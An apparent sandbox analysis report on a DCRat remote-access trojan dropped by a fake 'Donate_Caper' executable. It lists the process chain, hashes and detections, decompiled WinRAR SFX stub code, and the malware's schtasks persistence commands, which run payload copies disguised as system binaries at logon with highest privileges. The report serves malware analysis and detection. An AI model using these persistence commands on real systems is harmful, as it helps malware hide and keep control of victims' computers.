Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Donate_Caper_Fixed.exe'
Imagebase:	0x400000
File size:	3422325 bytes
MD5 hash:	E462B06D82894C0E3EFE75250FA64103
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: Donate_Caper2021.sfx.exe PID: 6948 Parent PID: 6844

General

Start time:	05:40:35
Start date:	03/04/2021
Path:	C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe'
Imagebase:	0x400000
File size:	670421 bytes
MD5 hash:	A41B479849B06E8F0DAEA6AAFA5C79BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: Donate_Caper2021.exe PID: 7052 Parent PID: 6948

General

Start time:	05:40:39
Start date:	03/04/2021
Path:	C:\Users\user\AppData\Roaming\Donate_Caper2021.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Donate_Caper2021.exe'
Imagebase:	0x160000
File size:	965296 bytes
MD5 hash:	8C0FB72C8051214BC9581F4948D04478
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 40%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 6256 Parent PID: 7052

General

Start time:	05:40:42
Start date:	03/04/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\sessionhostmonitor\RfInN2Wh.vbe'
Imagebase:	0x380000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1556 Parent PID: 6256

General

Start time:	05:40:49
Start date:	03/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\sessionhostmonitor\1blSZLIJyv82rdJZrD2y.bat' '
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1744 Parent PID: 1556

General

Start time:	05:40:50
Start date:	03/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: sessionhostmonitorSavesruntimeNet.exe PID: 5168 Parent PID: 1556

General

Start time:	05:40:50
Start date:	03/04/2021
Path:	C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe
Wow64 process (32bit):	false
Commandline:	C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe
Imagebase:	0x2c3f9260000
File size:	648192 bytes
MD5 hash:	241F61E88F1F7B6ACF5B199B33CB84B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.698876300.000002C380001000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 6548 Parent PID: 5168

General

Start time:	05:40:55
Start date:	03/04/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'schtasks' /create /tn 'audiodg' /sc ONLOGON /tr ''C:\Windows\AppReadiness\audiodg.exe'' /rl HIGHEST /f
Imagebase:	0x7ff717ba0000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 6756 Parent PID: 6548

General

Start time:	05:40:55
Start date:	03/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 6812 Parent PID: 5168

General

Start time:	05:40:55
Start date:	03/04/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'schtasks' /create /tn 'msiexec' /sc ONLOGON /tr ''C:\Windows\System32\d3d9on12\msiexec.exe'' /rl HIGHEST /f
Imagebase:	0x7ff717ba0000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 6476 Parent PID: 6812

General

Start time:	05:40:56
Start date:	03/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 6584 Parent PID: 5168

General

Start time:	05:40:56
Start date:	03/04/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'schtasks' /create /tn 'UsoClient' /sc ONLOGON /tr ''C:\Windows\System32\wlanapi\UsoClient.exe'' /rl HIGHEST /f
Imagebase:	0x7ff717ba0000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 6624 Parent PID: 6584

General

Start time:	05:40:56
Start date:	03/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: audiodg.exe PID: 6636 Parent PID: 968

General

Start time:	05:40:57
Start date:	03/04/2021
Path:	C:\Windows\AppReadiness\audiodg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\AppReadiness\audiodg.exe
Imagebase:	0x1d413180000
File size:	648192 bytes
MD5 hash:	241F61E88F1F7B6ACF5B199B33CB84B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.909612258.000001D414E61000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 32%, Metadefender, Browse Detection: 42%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 6712 Parent PID: 5168

General

Start time:	05:40:57
Start date:	03/04/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'schtasks' /create /tn 'HxTsr' /sc ONLOGON /tr ''C:\MSOCache\All Users\{90160000-0115-0409-0000-0000000FF1CE}-C\HxTsr.exe'' /rl HIGHEST /f
Imagebase:	0x7ff717ba0000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msiexec.exe PID: 6544 Parent PID: 968

General

Start time:	05:40:57
Start date:	03/04/2021
Path:	C:\Windows\System32\d3d9on12\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\d3d9on12\msiexec.exe
Imagebase:	0x1b228760000
File size:	648192 bytes
MD5 hash:	241F61E88F1F7B6ACF5B199B33CB84B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.725689848.000001B22A5C1000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 32%, Metadefender, Browse Detection: 42%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 6496 Parent PID: 6712

General

Start time:	05:40:57
Start date:	03/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: schtasks.exe PID: 6992 Parent PID: 5168

General

Start time:	05:40:58
Start date:	03/04/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'schtasks' /create /tn 'dwm' /sc ONLOGON /tr ''C:\Program Files (x86)\microsoft.net\ADOMD.NET\dwm.exe'' /rl HIGHEST /f
Imagebase:	0x7ff717ba0000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 7008 Parent PID: 6992

General

Start time:	05:40:58
Start date:	03/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: schtasks.exe PID: 7028 Parent PID: 5168

General

Start time:	05:40:59
Start date:	03/04/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'schtasks' /create /tn 'conhost' /sc ONLOGON /tr ''C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe'' /rl HIGHEST /f
Imagebase:	0x7ff717ba0000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 7072 Parent PID: 7028

General

Start time:	05:40:59
Start date:	03/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 7052 Parent PID: 968

General

Start time:	05:41:00
Start date:	03/04/2021
Path:	C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe
Imagebase:	0x2716da80000
File size:	648192 bytes
MD5 hash:	241F61E88F1F7B6ACF5B199B33CB84B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001C.00000002.734284162.0000027100001000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 32%, Metadefender, Browse Detection: 42%, ReversingLabs

Chronological Activities

Analysis Process: conhost.exe PID: 6280 Parent PID: 5168

General

Start time:	05:41:00
Start date:	03/04/2021
Path:	C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe
Imagebase:	0x22707bc0000
File size:	648192 bytes
MD5 hash:	241F61E88F1F7B6ACF5B199B33CB84B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.714934472.0000022709901000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: dwm.exe PID: 6912 Parent PID: 968

General

Start time:	05:41:00
Start date:	03/04/2021
Path:	C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\microsoft.net\ADOMD.NET\dwm.exe
Imagebase:	0x23847cf0000
File size:	648192 bytes
MD5 hash:	241F61E88F1F7B6ACF5B199B33CB84B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.739273160.0000023849951000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 32%, Metadefender, Browse Detection: 42%, ReversingLabs

Chronological Activities

Analysis Process: audiodg.exe PID: 6104 Parent PID: 3424

General

Start time:	05:41:07
Start date:	03/04/2021
Path:	C:\Windows\AppReadiness\audiodg.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\AppReadiness\audiodg.exe'
Imagebase:	0x26f004c0000
File size:	648192 bytes
MD5 hash:	241F61E88F1F7B6ACF5B199B33CB84B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.729298028.0000026F02331000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: msiexec.exe PID: 7148 Parent PID: 3424

General

Start time:	05:41:15
Start date:	03/04/2021
Path:	C:\Windows\System32\d3d9on12\msiexec.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\d3d9on12\msiexec.exe'
Imagebase:	0x176ca3f0000
File size:	648192 bytes
MD5 hash:	241F61E88F1F7B6ACF5B199B33CB84B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.750274756.00000176CC091000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Donate_Caper_Fixed.exe PID: 6844 Parent PID: 5984 Donate_Caper_Fixed.exeCOMMON

Executed Functions

Function 0040FB40, Relevance: 45.7, APIs: 19, Strings: 7, Instructions: 160
filecomwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040FB40(void* __edx, void* __eflags) {
				void* _v8;
				WCHAR* _v12;
				char _v16;
				intOrPtr _v28;
				char _v56;
				intOrPtr _v68;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				WCHAR* _t20;
				void* _t24;
				struct HBITMAP__* _t25;
				void* _t39;
				long _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t51;
				void* _t53;
				void* _t57;
				void* _t71;
				void* _t72;
				struct HINSTANCE__* _t74;
				void* _t76;
				void* _t81;
				intOrPtr _t93;

				_t71 = __edx;
				E00410A27(1);
				__imp__OleInitialize(0, _t72, _t76, _t57); // executed
				E00411A88(0x44ea70);
				E0041A110(0x439cd8, 0x439cd8, 0, 0x7000);
				_t20 = GetCommandLineW();
				_v12 = _t20;
				_t86 = _t20;
				if(_t20 != 0) {
					E0040D31C(_t86, _t20);
					if( *0x440d31 == 0) {
						SetEnvironmentVariableW(L"sfxcmd", _v12);
					} else {
						_t51 = OpenFileMappingW(4, 0, L"winrarsfxmappingfile.tmp");
						_v12 = _t51;
						if(_t51 != 0) {
							_t53 = MapViewOfFile(_t51, 4, 0, 0, 0x7000);
							_v8 = _t53;
							if(_t53 != 0) {
								E0041BB80(0, 0x439cd8, 0x7000, 0x439cd8, _t53, 0x7000);
								SetEnvironmentVariableW(L"sfxcmd", 0x439cd8);
							}
							UnmapViewOfFile(_v8);
						}
						CloseHandle(_v12);
					}
				}
				GetModuleFileNameW(0, 0x438cd8, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0x438cd8); // executed
				_t74 = GetModuleHandleW(0);
				 *0x432a64 = _t74;
				 *0x432a68 = _t74; // executed
				_t24 = LoadIconW(_t74, 0x64); // executed
				 *0x438cd4 = _t24; // executed
				_t25 = LoadBitmapW( *0x432a68, 0x65); // executed
				 *0x438cd0 = _t25; // executed
				E00419958( &_v16); // executed
				E0040C045(0x432a7c, _t71, _t81, 0x438cd8);
				E00418C53( &_v96);
				E00418C53( &_v56);
				_v68 = E0040CF18(0x64);
				_v28 = E0040CF18(0x64);
				 *0x437ccc =  &_v96;
				 *0x437cc8 =  &_v56; // executed
				DialogBoxParamW(_t74, L"STARTDLG", 0, E0040F2B8, 0); // executed
				 *0x437cc8 = 0;
				 *0x437ccc = 0;
				E00418C75( &_v56);
				E00418C75( &_v96);
				E004199B2();
				if( *0x440d28 != 0) {
					E0040D583(_t74);
				}
				E0040CD80(0x44c2d8);
				_t91 =  *0x440d0c;
				if( *0x440d0c > 0) {
					_push( *0x440d00);
					E00419DFE(0, _t74, 0x438cd8, _t91);
				}
				DeleteObject( *0x438cd4);
				_t39 =  *0x438cd0;
				if(_t39 != 0) {
					DeleteObject(_t39);
				}
				_t93 =  *0x432a6c; // 0x0
				if(_t93 == 0 &&  *0x440cea != 0) {
					E00406222(0x432a6c, 0xff);
				}
				_t40 =  *0x440d1c;
				 *0x440cea = 1;
				if( *0x440d1c != 0) {
					E0040D544(_t40);
				}
				_t41 =  *0x440d18;
				if(_t41 != 0) {
					Sleep(_t41); // executed
				}
				__imp__OleUninitialize(); // executed
				_t42 =  *0x440d14;
				if(_t42 > 0) {
					return _t42;
				} else {
					_t43 =  *0x432a6c; // 0x0
					return _t43;
				}
			}

0x0040fb40
0x0040fb4b
0x0040fb53
0x0040fb5e
0x0040fb70
0x0040fb78
0x0040fb7e
0x0040fb81
0x0040fb83
0x0040fb86
0x0040fb91
0x0040fbee
0x0040fb93
0x0040fb9b
0x0040fba1
0x0040fba6
0x0040fbae
0x0040fbb4
0x0040fbb9
0x0040fbbe
0x0040fbcc
0x0040fbcc
0x0040fbd5
0x0040fbd5
0x0040fbde
0x0040fbde
0x0040fb91
0x0040fc00
0x0040fc0c
0x0040fc19
0x0040fc1e
0x0040fc24
0x0040fc2a
0x0040fc38
0x0040fc3d
0x0040fc46
0x0040fc4b
0x0040fc56
0x0040fc5e
0x0040fc66
0x0040fc74
0x0040fc82
0x0040fc89
0x0040fc97
0x0040fc9c
0x0040fca5
0x0040fcab
0x0040fcb1
0x0040fcb9
0x0040fcc1
0x0040fccc
0x0040fcce
0x0040fcce
0x0040fcd8
0x0040fcdd
0x0040fce3
0x0040fce5
0x0040fceb
0x0040fcf0
0x0040fcfd
0x0040fcff
0x0040fd06
0x0040fd09
0x0040fd09
0x0040fd0b
0x0040fd11
0x0040fd25
0x0040fd25
0x0040fd2a
0x0040fd2f
0x0040fd38
0x0040fd3b
0x0040fd3b
0x0040fd40
0x0040fd47
0x0040fd4a
0x0040fd4a
0x0040fd50
0x0040fd56
0x0040fd60
0x0040fd68
0x0040fd62
0x0040fd62
0x00000000
0x0040fd62

APIs

Part of subcall function 00410A27: GetModuleHandleW.KERNEL32(kernel32,0040FB50,00000001), ref: 00410A2C
Part of subcall function 00410A27: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410A3C

OleInitialize.OLE32(00000000), ref: 0040FB53

Part of subcall function 00411A88: GetCPInfo.KERNEL32(00000000,?,?,?,?,0040FB63), ref: 00411A99
Part of subcall function 00411A88: IsDBCSLeadByte.KERNEL32(00000000), ref: 00411AAD

_memset.LIBCMT ref: 0040FB70
GetCommandLineW.KERNEL32 ref: 0040FB78
OpenFileMappingW.KERNEL32(00000004,00000000,winrarsfxmappingfile.tmp), ref: 0040FB9B
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00007000), ref: 0040FBAE
SetEnvironmentVariableW.KERNEL32(sfxcmd,00439CD8), ref: 0040FBCC
UnmapViewOfFile.KERNEL32(?), ref: 0040FBD5
CloseHandle.KERNEL32(?), ref: 0040FBDE
SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0040FBEE
GetModuleFileNameW.KERNEL32(00000000,00438CD8,00000800), ref: 0040FC00
SetEnvironmentVariableW.KERNELBASE(sfxname,00438CD8), ref: 0040FC0C
GetModuleHandleW.KERNEL32(00000000), ref: 0040FC13
LoadIconW.USER32(00000000,00000064), ref: 0040FC2A
LoadBitmapW.USER32(00000065), ref: 0040FC3D
DialogBoxParamW.USER32 ref: 0040FC9C
DeleteObject.GDI32 ref: 0040FCFD
DeleteObject.GDI32(?), ref: 0040FD09
Sleep.KERNEL32(?), ref: 0040FD4A
OleUninitialize.OLE32 ref: 0040FD50

Strings

pD, xrefs: 0040FB59
sfxcmd, xrefs: 0040FBC7, 0040FBE9
|*C, xrefs: 0040FC51
STARTDLG, xrefs: 0040FC8E
sfxname, xrefs: 0040FC07
l*C, xrefs: 0040FD20
winrarsfxmappingfile.tmp, xrefs: 0040FB93

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: File$EnvironmentHandleModuleVariable$DeleteLoadObjectView$AddressBitmapByteCloseCommandDialogIconInfoInitializeLeadLineMappingNameOpenParamProcSleepUninitializeUnmap_memset
String ID: STARTDLG$l*C$pD$sfxcmd$sfxname$winrarsfxmappingfile.tmp$|*C
API String ID: 3777249056-1397063104
Opcode ID: 65df188769bbc90ec93588eec8b3ce38c0a3ce69df9531d492007aa1f3191a80
Instruction ID: 6c3f465ec49cb22586621f2da5e7f47674ff60289fc25afc9bbdbb5778315db9
Opcode Fuzzy Hash: 65df188769bbc90ec93588eec8b3ce38c0a3ce69df9531d492007aa1f3191a80
Instruction Fuzzy Hash: 0451C371A01205EFD720BFA1EC8999E7F79FB05304B50043FFA01A22A1DB785959CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401CA9, Relevance: 11.3, APIs: 3, Strings: 3, Instructions: 769
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00401CA9(intOrPtr* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t334;
				unsigned int _t340;
				signed int _t344;
				signed int _t345;
				void* _t347;
				signed int _t349;
				char _t369;
				signed short _t376;
				signed int _t382;
				void* _t388;
				signed int _t389;
				signed int _t392;
				void* _t396;
				signed char _t401;
				char _t406;
				signed int _t414;
				char _t415;
				signed int _t418;
				signed int _t419;
				void* _t420;
				void* _t422;
				signed int _t429;
				signed short _t434;
				signed short _t439;
				signed char _t444;
				signed int _t448;
				signed int _t454;
				signed int _t461;
				signed int _t468;
				void* _t469;
				void* _t471;
				short* _t472;
				void* _t481;
				intOrPtr _t488;
				void* _t492;
				signed char _t495;
				signed int _t497;
				void* _t500;
				void* _t503;
				intOrPtr* _t509;
				signed int _t521;
				signed int _t526;
				signed int* _t530;
				unsigned int _t531;
				signed int _t533;
				signed int _t545;
				char _t556;
				char _t557;
				signed int _t559;
				signed int _t560;
				signed int* _t576;
				signed int _t620;
				signed int _t621;
				signed int _t622;
				signed int _t644;
				signed int _t646;
				signed int _t650;
				signed int _t652;
				void* _t653;
				void* _t656;
				signed int _t659;
				signed int _t660;
				signed int _t662;
				signed int _t665;
				signed int _t666;
				void* _t667;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				unsigned int _t676;
				signed int _t677;
				intOrPtr _t680;
				signed int _t681;
				signed int _t683;
				void* _t685;
				signed int _t694;

				E00419DD4(E0042909F, _t685);
				E0041A3E0(0x2874);
				_push(_t677);
				_t509 = __ecx;
				E0040B3F7(_t685 - 0x48, __ecx);
				_t650 = 0;
				 *((intOrPtr*)(_t685 - 4)) = 0;
				if( *((char*)(__ecx + 0xa23c)) == 0) {
					L9:
					 *((char*)(_t685 - 0xe)) = 0;
					L11:
					E0040B189(_t685 - 0x48, _t650, 7); // executed
					__eflags =  *((intOrPtr*)(_t685 - 0x34)) - _t650;
					if(__eflags == 0) {
						L5:
						E00401C1F(_t509, _t644, _t696);
						L6:
						_t697 =  *((intOrPtr*)(_t685 - 0x48)) - _t650;
						if( *((intOrPtr*)(_t685 - 0x48)) != _t650) {
							_push( *((intOrPtr*)(_t685 - 0x48)));
							E00419DFE(_t509, _t650, _t677, _t697);
						}
						_t334 = 0;
						L134:
						 *[fs:0x0] =  *((intOrPtr*)(_t685 - 0xc));
						return _t334;
					}
					 *(_t509 + 0x572c) = E0040B23B(_t685 - 0x48) & 0x0000ffff;
					 *(_t509 + 0x573c) = 0;
					_t677 = E0040B223(_t685 - 0x48) & 0x000000ff;
					_t340 = E0040B23B(_t685 - 0x48) & 0x0000ffff;
					 *(_t509 + 0x5734) = _t340;
					 *(_t509 + 0x573c) = _t340 >> 0x0000000e & 0x00000001;
					_t344 = E0040B23B(_t685 - 0x48) & 0x0000ffff;
					 *(_t509 + 0x5738) = _t344;
					 *(_t509 + 0x5730) = _t677;
					__eflags = _t344 - 7;
					if(__eflags >= 0) {
						_t677 = _t677 - 0x73;
						__eflags = _t677;
						_t652 = 3;
						if(_t677 == 0) {
							 *(_t509 + 0x5730) = 1;
						} else {
							_t677 = _t677 - 1;
							__eflags = _t677;
							if(_t677 == 0) {
								 *(_t509 + 0x5730) = 2;
							} else {
								_t677 = _t677 - 6;
								__eflags = _t677;
								if(_t677 == 0) {
									 *(_t509 + 0x5730) = _t652;
								} else {
									_t677 = _t677 - 1;
									__eflags = _t677;
									if(_t677 == 0) {
										 *(_t509 + 0x5730) = 5;
									}
								}
							}
						}
						_t521 =  *(_t509 + 0x5730);
						 *(_t509 + 0x5724) = _t521;
						__eflags = _t521 - 0x75;
						if(_t521 != 0x75) {
							__eflags = _t521 - 1;
							if(_t521 != 1) {
								L26:
								_t345 = _t344 + 0xfffffff9;
								__eflags = _t345;
								_push(_t345);
								L27:
								E0040B189(_t685 - 0x48, _t652);
								_t347 = E004010D3(_t509,  *(_t509 + 0x5738));
								asm("adc ecx, [ebx+0xa224]");
								 *((intOrPtr*)(_t509 + 0xa228)) = _t347 +  *((intOrPtr*)(_t509 + 0xa220));
								_t349 =  *(_t509 + 0x5730);
								 *((intOrPtr*)(_t509 + 0xa22c)) = 0;
								__eflags = _t349 - 1;
								if(__eflags == 0) {
									_t653 = _t509 + 0x5750;
									E00409886(_t653);
									_t526 = 5;
									memcpy(_t653, _t509 + 0x572c, _t526 << 2);
									 *(_t509 + 0x5764) = E0040B23B(_t685 - 0x48);
									_t677 = E0040B270(_t685 - 0x48);
									_t530 = _t509 + 0x5758;
									_t531 =  *_t530;
									 *(_t509 + 0xa235) =  *_t530 & 0x00000001;
									 *(_t509 + 0xa234) = _t531 >> 0x00000003 & 0x00000001;
									 *(_t509 + 0xa237) = _t531 >> 0x00000002 & 0x00000001;
									 *(_t509 + 0xa23b) = _t531 >> 0x00000006 & 0x00000001;
									 *(_t509 + 0x5768) = _t677;
									 *(_t509 + 0xa23c) = _t531 >> 0x00000007 & 0x00000001;
									__eflags = _t677;
									if(_t677 != 0) {
										L114:
										_t369 = 1;
										__eflags = 1;
										L115:
										 *((char*)(_t509 + 0xa238)) = _t369;
										 *(_t509 + 0x576c) = _t531 >> 0x00000001 & 0x00000001;
										_t533 = _t531 >> 0x00000004 & 0x00000001;
										__eflags = _t533;
										 *(_t509 + 0xa239) = _t531 >> 0x00000008 & 0x00000001;
										 *(_t509 + 0xa23a) = _t533;
										L116:
										_t650 = 0;
										_t376 = E0040B3A7(_t685 - 0x48, 0);
										__eflags =  *(_t509 + 0x572c) - (_t376 & 0x0000ffff);
										if( *(_t509 + 0x572c) == (_t376 & 0x0000ffff)) {
											L128:
											__eflags =  *((intOrPtr*)(_t509 + 0xa22c)) -  *((intOrPtr*)(_t509 + 0xa224));
											if(__eflags > 0) {
												L131:
												_t680 =  *((intOrPtr*)(_t685 - 0x34));
												__eflags =  *((intOrPtr*)(_t685 - 0x48)) - _t650;
												if(__eflags != 0) {
													_push( *((intOrPtr*)(_t685 - 0x48)));
													E00419DFE(_t509, _t650, _t680, __eflags);
												}
												_t334 = _t680;
												goto L134;
											}
											if(__eflags < 0) {
												goto L13;
											}
